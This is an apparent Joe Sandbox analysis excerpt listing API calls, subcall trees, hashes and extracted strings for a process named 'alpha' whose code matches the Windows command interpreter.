                                                                                      • Instruction ID: 137b81312464587e912c7fe46cf54c87c312066157ef4a3f296ecb72c3305a52
                                                                                      • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                      • Instruction Fuzzy Hash: 28511821F0868285EAB4AF2595C42BAE694FB5CBA0FC45236DE6E677D0DF3CE441C710

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754D9A
                                                                                        • Part of subcall function 00007FF7937558E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF79376C6DB), ref: 00007FF7937558EF
                                                                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754DBB
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793754DCA
                                                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754DE0
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793754DEE
                                                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754E04
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF793750589
                                                                                        • Part of subcall function 00007FF793750580: SetConsoleMode.KERNELBASE ref: 00007FF79375059E
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF7937505AF
                                                                                        • Part of subcall function 00007FF793750580: GetConsoleMode.KERNELBASE ref: 00007FF7937505C5
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF7937505EF
                                                                                        • Part of subcall function 00007FF793750580: GetConsoleMode.KERNELBASE ref: 00007FF793750605
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF793750632
                                                                                        • Part of subcall function 00007FF793750580: SetConsoleMode.KERNELBASE ref: 00007FF793750647
                                                                                        • Part of subcall function 00007FF793754A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A28
                                                                                        • Part of subcall function 00007FF793754A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A66
                                                                                        • Part of subcall function 00007FF793754A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A7D
                                                                                        • Part of subcall function 00007FF793754A14: memmove.MSVCRT(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A9A
                                                                                        • Part of subcall function 00007FF793754A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754AA2
                                                                                        • Part of subcall function 00007FF793754AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793748798), ref: 00007FF793754AD6
                                                                                        • Part of subcall function 00007FF793754AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793748798), ref: 00007FF793754AEF
                                                                                        • Part of subcall function 00007FF793755554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF793754E35), ref: 00007FF7937555DA
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF793755623
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF793755667
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF7937556BE
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF793755702
                                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754E35
                                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754E81
                                                                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754F69
                                                                                      • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754F95
                                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FB0
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FC1
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FD8
                                                                                      • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FF8
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793755037
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79375504B
                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7937550DF
                                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7937550F2
                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79375510F
                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793755130
                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79375514A
                                                                                      • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793755175
                                                                                        • Part of subcall function 00007FF793753578: _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                        • Part of subcall function 00007FF793753578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                        • Part of subcall function 00007FF793753578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                        • Part of subcall function 00007FF793753578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                        • Part of subcall function 00007FF793753578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                        • Part of subcall function 00007FF793753578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                      • API String ID: 1049357271-3021193919
                                                                                      • Opcode ID: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                                                                      • Instruction ID: c112c52ef1ec8d21919dcb0b537597efa9e3325dcbee75d4cbb59cbde2239fc3
                                                                                      • Opcode Fuzzy Hash: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                                                                      • Instruction Fuzzy Hash: 33C17421A08A4296FAA4BB31A8D01B9F7A9FF4DB91F854135D90F277A1DF3CA5058370

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                      • String ID: :
                                                                                      • API String ID: 1809961153-336475711
                                                                                      • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                      • Instruction ID: a379a60f1049dde1cd64dc169d5e85af75d6a4255325b09d43e1e1edf2e1aead
                                                                                      • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                      • Instruction Fuzzy Hash: 17D1402270DB8592EAB4EF25E4842BAF7A5FB88740F844136D94E537A4DF3CE545C720

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                      • API String ID: 2622545777-4197029667
                                                                                      • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                      • Instruction ID: 272626189376325584adc33a3d91f497d77b2207a10d3037007bcf846100987b
                                                                                      • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                      • Instruction Fuzzy Hash: 38915D61B09A8685EEB8AB30D8905F9A3A8FF4CB85FC44136C90E67795DF3CE504C360

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                                      • String ID: CMD.EXE
                                                                                      • API String ID: 1606018815-3025314500
                                                                                      • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                      • Instruction ID: 9249309a18d82c0b90a6bb40c08126453e5d43e8fc4e50ee32c00e719d7b95d6
                                                                                      • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                      • Instruction Fuzzy Hash: CF41D331A096428BF7A86B34E8D51B8B7A8FB8E752FC84179C50F533A0DF3CA5058661

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleTitlewcschr
                                                                                      • String ID: /$:
                                                                                      • API String ID: 2364928044-4222935259
                                                                                      • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                      • Instruction ID: 7a50722306868e47fb996f3c8b1dd0867a478090d794f9a3903296cce8a45828
                                                                                      • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                      • Instruction Fuzzy Hash: 4AC19065A08643A2FAB4BB35D4C8379E2AAEF48B90FC44135D91E672D5DF3CE840D720

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                      • String ID:
                                                                                      • API String ID: 4291973834-0
                                                                                      • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                      • Instruction ID: a6e33362265b251b22fd1a744eba515df69cefe95028110cbd91f614d4653b99
                                                                                      • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                      • Instruction Fuzzy Hash: C941D921A1864392F6F4BB30E8C0275A2A9AF4C746F940436D91EB77A0DF7DED408761

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A28
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A66
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A7D
                                                                                      • memmove.MSVCRT(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A9A
                                                                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754AA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                      • String ID:
                                                                                      • API String ID: 1623332820-0
                                                                                      • Opcode ID: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                                      • Instruction ID: 95d4df94d86eb06f24399620539ece9ad3a42f0006c058c1ffe19f7d162591e8
                                                                                      • Opcode Fuzzy Hash: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                                      • Instruction Fuzzy Hash: 6511A722A1874182EEA4AF65B484079FBA4FB8DF81F899039DE4F13744DF3DE4418760

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1826527819-0
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793751EA0: wcschr.MSVCRT(?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF793770D54), ref: 00007FF793751EB3
                                                                                      • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7937492AC), ref: 00007FF7937530CA
                                                                                      • SetErrorMode.KERNELBASE ref: 00007FF7937530DD
                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7937530F6
                                                                                      • SetErrorMode.KERNELBASE ref: 00007FF793753106
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$FullNamePathwcschr
                                                                                      • String ID:
                                                                                      • API String ID: 1464828906-0
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                      • API String ID: 2221118986-3416068913
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: memsetwcschr
                                                                                      • String ID: 2$COMSPEC
                                                                                      • API String ID: 1764819092-1738800741
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                      • String ID:
                                                                                      • API String ID: 4254246844-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                      • String ID:
                                                                                      • API String ID: 2643372051-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: _get_osfhandle$ConsoleMode
                                                                                      • String ID:
                                                                                      • API String ID: 1591002910-0
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: DriveType
                                                                                      • String ID: :
                                                                                      • API String ID: 338552980-336475711
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                        • Part of subcall function 00007FF79374CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      • GetConsoleTitleW.KERNELBASE ref: 00007FF793755B52
                                                                                        • Part of subcall function 00007FF793754224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF793754297
                                                                                        • Part of subcall function 00007FF793754224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7937542D7
                                                                                        • Part of subcall function 00007FF793754224: memset.MSVCRT ref: 00007FF7937542FD
                                                                                        • Part of subcall function 00007FF793754224: memset.MSVCRT ref: 00007FF793754368
                                                                                        • Part of subcall function 00007FF793754224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF793754380
                                                                                        • Part of subcall function 00007FF793754224: wcsrchr.MSVCRT ref: 00007FF7937543E6
                                                                                        • Part of subcall function 00007FF793754224: lstrcmpW.KERNELBASE ref: 00007FF793754401
                                                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF793755BC7
                                                                                      Similarity
                                                                                      • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                      • String ID:
                                                                                      • API String ID: 497088868-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: Concurrency::cancel_current_taskmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 1412018758-0
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1617791916-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: exit
                                                                                      • String ID:
                                                                                      • API String ID: 2483651598-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: DefaultUser
                                                                                      • String ID:
                                                                                      • API String ID: 3358694519-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID:
                                                                                      • API String ID: 2221118986-0
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                                      • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                                      • API String ID: 1388555566-2647954630
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                                                      • String ID: &<|>$+: $:$:EOF$=,;$^
                                                                                      • API String ID: 511550188-726566285
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmp$wcschr$wcstol
                                                                                      • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                                                      • API String ID: 1738779099-3004636944
                                                                                      APIs
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793767F44
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793767F5C
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793767F9E
                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793767FFF
                                                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793768020
                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793768036
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793768061
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF793768075
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7937680D6
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF7937680EA
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF793768177
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF79376819A
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF7937681BD
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF7937681DC
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF7937681FB
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF79376821A
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF793768239
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793768291
                                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7937682D7
                                                                                      • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7937682FB
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF79376831A
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793768364
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF793768378
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF79376839A
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7937683AE
                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7937683E6
                                                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793768403
                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793768418
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                      • API String ID: 3637805771-3100821235
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                                      • String ID: %s$%s
                                                                                      • API String ID: 3623545644-3518022669
                                                                                      • Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                                                                      • Instruction ID: ac08597a9c54399f2925a9cd23fc6cdf852e9f5b6a2316b453e1c819fc97aa4b
                                                                                      • Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                                                                      • Instruction Fuzzy Hash: 68D2B431A086828AFBF4AB3594D42BDB7A9FB48758F904135DA0E67B95DF3CE404C711
                                                                                      Similarity
                                                                                      • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                                                      • String ID: %9d$%s
                                                                                      • API String ID: 4286035211-3662383364
